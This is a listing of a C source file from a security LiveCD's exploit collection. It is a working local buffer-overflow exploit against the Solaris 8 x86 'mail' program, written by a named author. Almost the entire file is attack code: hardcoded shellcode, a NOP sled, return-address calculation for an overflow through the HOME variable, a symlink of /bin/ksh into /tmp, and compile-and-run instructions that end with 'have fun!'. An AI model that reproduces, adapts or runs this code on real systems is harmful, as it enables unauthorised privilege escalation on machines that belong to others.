home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / local / mailex.c

< prev

next >

Wrap

C/C++ Source or Header  |  2005-02-12  |  5KB  |  186 lines

---

1. /* 
2. *  Solaris x86 mail HOME environment variable buffer overflow exploit 
3. *                      by Virtualcat (virtualcat@hotmail.com)
4. *                                    (virtualcat@xfocus.org)
5. *                                    (http://www.xfocus.org)
6. * 
7. *  Compile: gcc -o mailex mailex.c 
8. *  Run    : ./mailex [Adjustment] 
9. * 
10. *  Tested on Solaris 8 (x86).  Default should work. 
11. */ 
12.  
13. #include <fcntl.h> 
14. #include <unistd.h> 
15. #include <stdlib.h> 
16.  
17. #define    RET_DIS            1028 
18. #define    NOP            0x90 
19. #define    NNOP            512 
20.  
21. #define    ENV_VAR            "HOME" 
22.  
23. #define    USER_UPPER_MAGIC    0x08047fff 
24.  
25. /* Shell code taken from Pablo Sor's "mailx -F" exploit code    */ 
26. char shellCode[]= 
27.         "\xeb\x1c\x5e\x33\xc0\x33\xdb\xb3\x08\xfe\xc3\x2b\xf3\x88\x06" 
28.         "\x6a\x06\x50\xb0\x88\x9a\xff\xff\xff\xff\x07\xee\xeb\x06\x90" 
29.         "\xe8\xdf\xff\xff\xff\x55\x8b\xec\x83\xec\x08\xeb\x5d\x33\xc0" 
30.         "\xb0\x3a\xfe\xc0\xeb\x16\xc3\x33\xc0\x40\xeb\x10\xc3\x5e\x33" 
31.         "\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88\x7e\x06\xeb\x05\xe8\xec" 
32.         "\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f\xc3\x5e\x33\xc0\x89" 
33.         "\x76\x08\x88\x46\x07\x33\xd2\xb2\x06\x02\xd2\x89\x04\x16\x50" 
34.         "\x8d\x46\x08\x50\x8b\x46\x08\x50\xe8\xb5\xff\xff\xff\x33\xd2" 
35.         "\xb2\x06\x02\xd2\x03\xe2\x6a\x01\xe8\xaf\xff\xff\xff\x83\xc4" 
36.         "\x04\xe8\xc9\xff\xff\xff\x2f\x74\x6d\x70\x2f\x78\x78"; 
37.  
38. int get_esp() 
39. { 
40.     __asm__("mov %esp,%eax"); 
41. } 
42.  
43. int  getEnvAddr(const char* envPtr) 
44. { 
45.     int    envAddr = NULL; 
46.     int    retCode = 0; 
47.  
48.     char* charPtr = (char *) get_esp(); 
49.  
50.     /* Search for the starting address of the environment string for    */ 
51.     /* the specified environment variable                    */ 
52.     while((unsigned int)  charPtr < (unsigned int) USER_UPPER_MAGIC) 
53.     { 
54.         retCode = memcmp((unsigned char *) charPtr++, envPtr, 4); 
55.         /* Found */ 
56.         if(retCode == 0) 
57.         { 
58.             envAddr = (int) (charPtr - 1); 
59.             break; 
60.         } 
61.     } 
62.  
63.     return envAddr; 
64. } 
65.  
66. int main(int argc, char** argv) 
67. { 
68.  
69.     char    buff[256] = {0}; 
70.  
71.     int*    intPtr = NULL; 
72.     char*    buffPtr = NULL; 
73.     char*    charPtr = NULL; 
74.  
75.     int    retAddr = 0; 
76.     int    retValue = 0; 
77.  
78.  
79.     int    buffLen = 0; 
80.     int    adjustment = 0; 
81.     int    strLen = 0; 
82.     int    alignment = 0; 
83.     int    diff = 0; 
84.     int    i; 
85.  
86.     int shellCodeLen = strlen(shellCode); 
87.  
88.     if(argc == 2) 
89.     { 
90.         adjustment = atoi(argv[1]); 
91.     } 
92.  
93.     buffLen = strlen(ENV_VAR) + RET_DIS + NNOP + shellCodeLen + 1; 
94.  
95.     charPtr = getenv(ENV_VAR); 
96.  
97.     /* Adjust the stupid alignment    */ 
98.     strLen = strlen(charPtr) + 1; 
99.     alignment = strLen % 4; 
100.     if(alignment != 0) 
101.     { 
102.         alignment = 4 - alignment; 
103.         strLen += alignment; 
104.     } 
105.  
106.     alignment = buffLen % 4; 
107.     if(alignment != 0) 
108.     { 
109.         alignment = 4 - alignment; 
110.         buffLen += alignment; 
111.     }     
112.  
113.     retValue = getEnvAddr(ENV_VAR); 
114.      
115.     diff = buffLen - strLen; 
116.  
117.     retAddr = retValue - diff + strlen(ENV_VAR) + 1; 
118.  
119.     alignment = retAddr % 4; 
120.  
121.     if(alignment != 0) 
122.     { 
123.         alignment = 4 - alignment; 
124.     } 
125.     retAddr += RET_DIS + alignment +  adjustment; 
126.  
127.     /* If the $HOME/dead.letter file exists, then delete it    */ 
128.     /* Otherwise the overfolow won't take place        */ 
129.     strcpy(buff, charPtr); 
130.     strcat(buff, "/dead.letter"); 
131.  
132.     i = access(buff, F_OK); 
133.     if(i == 0) 
134.     { 
135.         unlink(buff); 
136.     } 
137.  
138.     /* Allocate memory for the evil buffer    */ 
139.     buffPtr = (char *) malloc(buffLen); 
140.  
141.     if(buffPtr != NULL) 
142.     { 
143.  
144.         strcpy(buffPtr, ENV_VAR); 
145.         strcat(buffPtr, "="); 
146.         charPtr = (char *) (buffPtr + strlen(buffPtr));     
147.          
148.         /* Fill the rest of the buffer with 'A'     */ 
149.         memset(charPtr, 0x41, buffLen - strlen(buffPtr)); 
150.  
151.         /* Butt in the return address            */ 
152.         intPtr = (int *) (charPtr + RET_DIS); 
153.         *intPtr++ = retAddr; 
154.  
155.         /* Make sure the NOPs are located word aligned     */ 
156.         charPtr = (char *) intPtr; 
157.         charPtr += alignment; 
158.  
159.         for(i=0; i<NNOP; i++) 
160.         { 
161.             *charPtr++ = NOP; 
162.         } 
163.  
164.         for(i=0; i<shellCodeLen; i++) 
165.         { 
166.             *charPtr++ = shellCode[i]; 
167.         } 
168.         *charPtr = 0; 
169.  
170.           symlink("/bin/ksh","/tmp/xx"); 
171.  
172.         putenv(buffPtr); 
173.  
174.         printf("Jumping to 0x%.8x\n", retAddr); 
175.         printf("Press Ctrl+C to contine,  have fun!\n"); 
176.  
177.         system("/usr/bin/mail a"); 
178.         unlink("/tmp/xx"); 
179.     } 
180.     else 
181.     { 
182.         printf("No more free memory!"); 
183.     } 
184. } 
185.  
186. /*..oO( I am virtual )Oo.. */